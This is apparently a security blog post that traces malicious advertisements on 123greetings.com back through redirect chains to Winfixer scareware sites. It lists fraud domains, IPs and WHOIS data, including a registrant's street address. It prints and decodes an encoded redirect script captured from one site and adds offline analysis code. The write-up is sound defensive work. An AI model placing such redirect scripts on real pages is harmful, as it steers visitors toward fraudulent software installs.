Malicious content appearing on 123greetings.com as discovered by seo.mhvt.com
This incident was originally reported on by seo.mhvt.com. seo.mhvt.com apparently reported the incident to 123greetings.com, but to no avail. I tried to get in touch with the gentleman behind seo.mhvt.com nearly 24 hours ago to see if he wanted to use the following information on his blog, but sadly he seems to be offline and hasn't been able to respond, so let's get this live, with all credit to Tom for the discovery of a hijack at 123greetings.com.
Ok, so let's take a look and see if we can help out with getting the advertisements shut down. As always, we will work backwards from the fraudware site that is the final destination. But first, let's look at the malicious advertisements that are causing problems at 123greetings.com:
One problem is a malicious advertisement touting dottunes.com (again) - note the RealMedia URL - we'll talk more about that later in the article. Another problem is a malicious pop-up.
I have reported both campaigns to my contacts at RealMedia; the first was shut down just one hour and 8 minutes later, the second (the popup) took a little longer to identify but has also been suspended.
Here is a screenshot of the malicious advertisement in situ:
Here is a shot of the malicious pop-up advertisement:
Now, let's have a look at exactly what happened, as always, working backwards - I'm going to do something a little different this time, and include deeper information that technicians may find interesting.
Hijack Number 1 at 123greetings.com - the dottunes advertisement
The final target fraudware site:
scanner2.malware-scan.com/5_swp/?tmn=null&aid=dulcineano&lid=intl&affid=&ax=0&ed=2&aid=dulcineano_ma5_mb1&lid=intl&affid=&ax=&ed=&mt_info=3958_0_11469
We also see:
prevedmarketing.com/?tmn=mwatmp&poa=dulcineano&pol=intl&apo=0&epo=1&edpo=2&mt_info=5166_3721_12669 (IP 190.15.73.254)
blessedads.com/?cmpid=dulcineano&adid=intl (IP 190.15.73.254)
thetechnorati.com/statss.php?campaign=dulcineano&u=1198232629 (IP 64.38.4.134 - abusive behaviour reported to IP owners, FastServers)
All of the above have the same referrer:
thetechnorati.com/swf/gnida.swf?campaign=dulcineano&u=1198232629 (IP 64.38.4.134)
-----
thetechnorati.com/swf/gnida.swf?campaign=dulcineano&u=1198232629
Referrer:
thetechnorati.com/statsg.php?u=1198232629&campaign=dulcineano
-----
thetechnorati.com/statsg.php?u=1198232629&campaign=dulcineano
Referrer:
thetechnorati.com/statsg.php?u=1198232629&campaign=dulcineano
-----
thetechnorati.com/statsa.php?u=1198232629&campaign=dulcineano
Referrer:
imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/ForceUp_LB_10661A/dottunes_728x90.swf?clickTAG=http: // oascentral.123greetings.com/RealMedia/ads/click_lx.ads/123greetings.com/home/home/L26/277614549/Top/123Greet/ForceUp_LB_10661A/ForceUp_LB_10661A.html/4f714855755565494477494141645076?http: // www.dottunes.net/?ref=123000
-----
imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/ForceUp_LB_10661A/dottunes_728x90.swf?clickTAG=http: // oascentral.123greetings.com/RealMedia/ads/click_lx.ads/123greetings.com/home/home/L26/277614549/Top/123Greet/ForceUp_LB_10661A/ForceUp_LB_10661A.html/4f714855755565494477494141645076?http: // www.dottunes.net/?ref=123000
Referrer:
www.123greetings.com/
As noted at the beginning of the article, the malicious advertisement featuring dot.tunes has been suspended.
Hijack Number 2 at 123greetings.com - the popup
Another bad guy that appears in the 123greetings.com network capture is a popup that redirects to a classic Winfixer site:
excursionglobe.com/?ref=e3&aff=x3
But where did the popup come from? I searched the network capture for the text “excursionglobe” and came up with 5 hits, working backwards:
- excursionglobe.com/code/print.php
- excursionglobe.com/?ref=e3&aff=x3 (this is the URL of the actual popup)
- toolbarqueries.google.com/search?client=navclient-auto&ch=62435547374&ie=UTF-8&oe=UTF-8&features=Rank&q=info:http%3A//www . excursionglobe.com/%3Fref%3De3%26aff%3Dx3
- xml.alexa.com/data?cli=10&dat=nsa&ver=quirk-searchstatus&uid=20060101000000&userip=126.12.3.4&url=www.excursionglobe.com
- oascentral.123greetings.com/RealMedia/ads/adstream_mjx.ads/123greetings.com/home/home/1805849198@Top,x01?q1=home&page=home
Ok, so RealMedia is the first session where excursionglobe appears. We take a closer look at that particular session and discover document.write code referencing the 2nd excursionglobe URL (the actual popup URL). The toolbarqueries.google.com and xml.alexa.com hits are not part of the attack chain: they are the analysis browser's own toolbar/extension rank lookups (a Google Toolbar PageRank query and an Alexa rank query) for the URL that had just been visited, which is why they carry the popup URL as a parameter.
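Both the referrer walk used for Hijack Number 1 above and the text search just described can be done over a capture in a few lines. The following is an added example, not code from the original post: each session is a {url, referrer, body} record, the CAPTURE array is constructed from URLs quoted on this page (some shortened), and the body strings are stand-ins for the real responses, not captured content.

```javascript
// Added example (not code from the original post): a small "work backwards"
// helper for a browser/proxy capture, automating the two steps this page does
// by hand: search every session for a string, then walk Referer headers from
// the final fraudware URL back towards the page that started it. Each session
// is {url, referrer, body}. CAPTURE is constructed from URLs quoted on this
// page (some shortened); the body strings are stand-ins, not real responses.
const OAS = "http://oascentral.123greetings.com/RealMedia/ads/adstream_mjx.ads/123greetings.com/home/home/1805849198@Top,x01?q1=home&page=home";
const SWF = "http://imagec05.247realmedia.com/RealMedia/ads/Creatives/123Greet/ForceUp_LB_10661A/dottunes_728x90.swf";
const STATSA = "http://thetechnorati.com/statsa.php?u=1198232629&campaign=dulcineano";
const STATSG = "http://thetechnorati.com/statsg.php?u=1198232629&campaign=dulcineano";
const GNIDA = "http://thetechnorati.com/swf/gnida.swf?campaign=dulcineano&u=1198232629";
const SCANNER = "http://scanner2.malware-scan.com/5_swp/?tmn=null&aid=dulcineano";
const POPUP = "http://excursionglobe.com/?ref=e3&aff=x3";

const CAPTURE = [
  { url: "http://www.123greetings.com/", referrer: "", body: "<html>front page</html>" },
  // Stand-in for the ad-server response that carried the document.write popup code.
  { url: OAS, referrer: "http://www.123greetings.com/",
    body: "document.write('<script>window.open(\"" + POPUP + "\")</script>')" },
  { url: SWF, referrer: "http://www.123greetings.com/", body: "" },
  { url: STATSA, referrer: SWF, body: "" },
  { url: STATSG, referrer: STATSG, body: "" },   // self-referrer, as seen in the real capture
  { url: GNIDA, referrer: STATSG, body: "" },
  { url: SCANNER, referrer: GNIDA, body: "" },
  { url: POPUP, referrer: "", body: "" },          // popup opened by script: no Referer
];

// Step 1: which sessions mention a string (in URL or body), in capture order?
function findMentions(capture, needle) {
  return capture
    .filter(s => s.url.includes(needle) || s.body.includes(needle))
    .map(s => s.url);
}

// Step 2: walk back from finalUrl. Follow the Referer while it points at a
// session we captured; when it is missing or self-referential, fall back to
// the earliest earlier session whose body contains the current URL (this is
// how a document.write/window.open popup gets tied to its ad-server response).
// A seen-set stops loops.
function traceBack(capture, finalUrl) {
  const byUrl = new Map(capture.map((s, i) => [s.url, i]));
  const chain = [];
  const seen = new Set();
  let idx = byUrl.get(finalUrl);
  while (idx !== undefined && !seen.has(idx)) {
    seen.add(idx);
    const cur = capture[idx];
    chain.push(cur.url);
    let prev = cur.referrer && cur.referrer !== cur.url ? byUrl.get(cur.referrer) : undefined;
    if (prev === undefined) {
      for (let i = 0; i < idx; i++) {
        if (capture[i].body.includes(cur.url)) { prev = i; break; }
      }
    }
    idx = prev;
  }
  return chain;
}

console.log(findMentions(CAPTURE, "excursionglobe"));
console.log(traceBack(CAPTURE, POPUP));
console.log(traceBack(CAPTURE, SCANNER));
```

The popup trace reaches the 123greetings.com front page because the body search bridges the gap left by the Referer-less popup. The dottunes trace stops at statsg.php: its Referer is itself and nothing earlier mentions it, which is exactly the point in the real capture where the statsa.php to dottunes_728x90.swf hop had to be found by hand. In practice Referers are frequently absent (popups, meta refresh, Flash clickTAG redirects), so the body search is the workhorse, not the fallback.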
The excursionglobe.com web site includes a couple of scripts viewable via View Source (make sure you add excursionglobe.com to IE's Restricted Sites zone to stop the redirect from triggering). This code immediately redirects a victim to the winerrorfixer site, often before the content of the excursionglobe page even loads.
For example, look at this script (copied from the excursionglobe site; as you can see, it is URL/percent-encoded):
%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%3e%20%76%61%72%20%69%3b%20%76%61%72%20%7a%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%20%20%76%61%72%20%64%20%3d%20%6e%65%77%20%44%61%74%65%28%29%3b%20%76%61%72%20%67%6d%74%48%6f%75%72%73%20%3d%20%64%2e%67%65%74%54%69%6d%65%7a%6f%6e%65%4f%66%66%73%65%74%28%29%2f%36%30%3b%76%61%72%20%72%65%64%20%3d%20%30%3b%20%66%6f%72%20%28%69%20%69%6e%20%7a%29%20%69%66%20%28%7a%5b%69%5d%20%3d%3d%20%67%6d%74%48%6f%75%72%73%29%20%20%72%65%64%20%3d%20%32%33%3b%20%69%66%20%28%72%65%64%20%21%3d%20%32%33%29%20%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%77%77%77%31%2e%77%69%6e%65%72%72%6f%72%66%69%78%65%72%2e%63%6f%6d%3f%73%69%74%65%5f%69%64%3d%57%45%46%26%72%65%66%3d%67%72%26%61%66%66%3d%74%6e%26%70%31%3d%31%26%70%32%3d%31%26%70%31%63%3d%30%26%70%32%63%3d%30%26%63%3d%31%22%3b%3c%2f%73%63%72%69%70%74%3e
The encoding took only a second or two to decode. Decoded, it is a short piece of JavaScript: it declares an empty array z, takes the visitor's timezone offset in hours (getTimezoneOffset()/60), sets a flag if that offset appears in z, and otherwise sets document.location.href to www1.winerrorfixer.com with affiliate parameters (site_id=WEF, ref=gr, aff=tn). Because z is empty, the timezone check never matches and every visitor is redirected; a populated z would let the operator exempt chosen time zones from the redirect.
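As an added example (not code from the original post, and not the fraudsters' file), here is a way to decode that blob and exercise its decision logic offline instead of loading the page in a browser. ENCODED is the blob quoted above; the decoded script is never evaluated, only parsed with regular expressions and re-implemented as a function that takes an arbitrary visitor timezone offset.

```javascript
// Added example (not code from the original post, nor the fraudsters' own
// file): decode the percent-encoded <script> captured from excursionglobe.com
// and re-run its decision logic offline, without executing the script itself.
// ENCODED is the blob quoted on the page, split for readability.
const ENCODED =
  "%3c%73%63%72%69%70%74%20%74%79%70%65%3d%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%3e" +
  "%20%76%61%72%20%69%3b%20%76%61%72%20%7a%20%3d%20%6e%65%77%20%41%72%72%61%79%28%29%3b" +
  "%20%20%76%61%72%20%64%20%3d%20%6e%65%77%20%44%61%74%65%28%29%3b" +
  "%20%76%61%72%20%67%6d%74%48%6f%75%72%73%20%3d%20%64%2e%67%65%74%54%69%6d%65%7a%6f%6e%65%4f%66%66%73%65%74%28%29%2f%36%30%3b" +
  "%76%61%72%20%72%65%64%20%3d%20%30%3b%20%66%6f%72%20%28%69%20%69%6e%20%7a%29%20%69%66%20%28%7a%5b%69%5d%20%3d%3d%20%67%6d%74%48%6f%75%72%73%29%20%20%72%65%64%20%3d%20%32%33%3b" +
  "%20%69%66%20%28%72%65%64%20%21%3d%20%32%33%29%20%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%2e%68%72%65%66%3d%22" +
  "%68%74%74%70%3a%2f%2f%77%77%77%31%2e%77%69%6e%65%72%72%6f%72%66%69%78%65%72%2e%63%6f%6d%3f%73%69%74%65%5f%69%64%3d%57%45%46%26%72%65%66%3d%67%72%26%61%66%66%3d%74%6e%26%70%31%3d%31%26%70%32%3d%31%26%70%31%63%3d%30%26%70%32%63%3d%30%26%63%3d%31%22%3b%3c%2f%73%63%72%69%70%74%3e";

// Plain percent-decoding; nothing is evaluated.
function decodeScript(encoded) {
  return decodeURIComponent(encoded);
}

// Pull the redirect target out of the decoded script text.
function extractRedirect(decoded) {
  const m = decoded.match(/document\.location\.href="([^"]+)"/);
  return m ? m[1] : null;
}

// Pull the contents of the `z` array literal: the list of timezone offsets
// (in hours) that are exempt from the redirect. In the captured script it is
// `new Array()` with no elements, so this returns [].
function extractExemptOffsets(decoded) {
  const m = decoded.match(/var z = new Array\(([^)]*)\)/);
  if (!m || m[1].trim() === "") return [];
  return m[1].split(",").map(s => Number(s.trim()));
}

// Re-implementation of the script's own decision so it can be run against any
// visitor offset. offsetHours is what `new Date().getTimezoneOffset()/60`
// yields in the visitor's browser: positive west of UTC (5 for US Eastern in
// winter), negative east of it (-3 for Moscow). The loose `==` mirrors the
// original.
function wouldRedirect(exemptOffsets, offsetHours) {
  let red = 0;
  for (const i in exemptOffsets) if (exemptOffsets[i] == offsetHours) red = 23;
  return red != 23;
}

const decoded = decodeScript(ENCODED);
console.log(decoded);
console.log("redirects to:", extractRedirect(decoded));
console.log("exempt offsets:", extractExemptOffsets(decoded));
console.log("US Eastern visitor redirected:", wouldRedirect(extractExemptOffsets(decoded), 5));
```

Run it and the decoded text is the script described above, with the redirect target http://www1.winerrorfixer.com?site_id=WEF&ref=gr&aff=tn&p1=1&p2=1&p1c=0&p2c=0&c=1 and an empty exemption list, so wouldRedirect is true for every offset. The useful habit this shows is to parse and re-implement, rather than run, anything you pull out of a malicious page: decodeURIComponent on a string is harmless, eval on the result is not.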
Yep, excursionglobe.com is nothing more than a front for the Winfixer crowd.
The attempts to install Winfixer that were triggered by the excursionglobe popup were nothing if not persistent.
We start with this:
If you ever see a notice like the above, click on the X (don't touch the OK or Cancel buttons pictured above). I clicked on the X and still ended up at the page below - note that the page is trying to install an ActiveX control:
We try to close the above page, we see this:
Ok, let's hit the X again - don't touch the OK or Cancel buttons pictured above:
FOR HEAVEN'S SAKE GO AWAY!!!! Ok, once more, click on the Red X - don't touch the OK button pictured above. Now what will we see?
Damn it, another page, this time trying to download "files". Persistent little bastards, aren't they?
Ok, so we click the Red X one more time, and finally the attempted installations go away.
Technical stuff...
Info re scanner2.malware-scan.com
IP: 77.91.229.104 (WEBALTA / Internet Search Company Moscow, Russia)
Side note: some other domains hosted on 77.91.229.* include malware-scan, webspyshield, malwarealarms and spyshredderscanner.
Now, how is *this* for redundancy - the lookup for scanner2.malware-scan.com came back with name servers all over the world (note, though, that these are the RIR-operated servers for the reverse (in-addr.arpa) zone of the 77/8 block, which is what an IP-address whois reports; they are not the authoritative servers for malware-scan.com itself, so the redundancy belongs to the registries, not the fraudsters):
NameServer: NS-PRI.RIPE.NET (193.0.0.195)
NameServer: SEC1.APNIC.NET (202.12.29.59 - APNIC Pty Ltd, Brisbane Australia)
NameServer: SEC3.APNIC.NET (202.12.28.140 - APNIC Pty Ltd, Brisbane Australia)
NameServer: TINNIE.ARIN.NET (168.143.101.18 - American Registry for Internet Numbers, Chantilly, US)
NameServer: NS.LACNIC.NET (200.160.0.7 - Latin American and Caribbean IP address Regional Registry, Mexico)
NameServer: SUNIC.SUNET.SE (192.36.125.2 - Sweden)
Info re thetechnorati.com
This is interesting - whois.yesnic.com is refusing the whois query:
whois -h whois.yesnic.com thetechnorati.com ... failed, couldn't connect to host: Connection refused (WSAECONNREFUSED)
That being said, we can trace the whois server's IP, yesnic.com (211.245.23.50), back to Hanaro Telecom Inc, Yeoeuido-dong, Yeongdeungpo-gu, Seoul.
IP: 64.38.4.134 (FastServers, Inc.)
Name Server: NS1.THETECHNORATI.COM (208.79.82.50 - Tranquil Hosting, Inc, USA)
Name Server: NS2.THETECHNORATI.COM (208.79.82.66 - Tranquil Hosting, Inc, USA)
Name Server: NS3.THETECHNORATI.COM (77.73.98.2 - NUCLEUS BVBA, Belgium)
Name Server: NS4.THETECHNORATI.COM (77.73.98.4 - NUCLEUS BVBA, Belgium)
There are a lot of well-known bad names on the first name server:
http://registrar.verisign-grs.com/cgi-bin/whois?whois_nic=208.79.82.50&type=nameserver&x=32&y=6
And the third:
http://registrar.verisign-grs.com/cgi-bin/whois?whois_nic=77.73.98.2&type=nameserver&whois_tld=Whois+TLD&x=14&y=4
Other domains hosted on 208.79.82.* include advancedcleaner, akamahi, antispywaresuite, antiviruspcsuite, bestsellerantivirus, securepccleaner, spyguardpro, storageprotector, systemdoctor and vozemiliogaranon.
Other domains that use name server 208.79.82.* include advancedcleaner, akamahi, antispywaresuite, antiviruspcsuite, bestsellerantivirus, errorsafe, securepccleaner, spyguardpro, storageprotector, systemdoctor, thetechnorati and vozemiliogaranon.
Info re excursionglobe.com
excursionglobe.com (IP 203.211.136.222 - WHOIS Mike Beket, 2057 Orchard Street Apt B, Urbana, Illinois 61801, USA)
Host: QALA SG AP QALA Singapore Pte Ltd 10 Science Park Road The Alpha Singapore Science Park II Singapore 117684.
Name servers: 208.109.78.191, 208.109.255.20 (GoDaddy com, Inc LLNW cust Go Daddy Software Route for Digidefense com)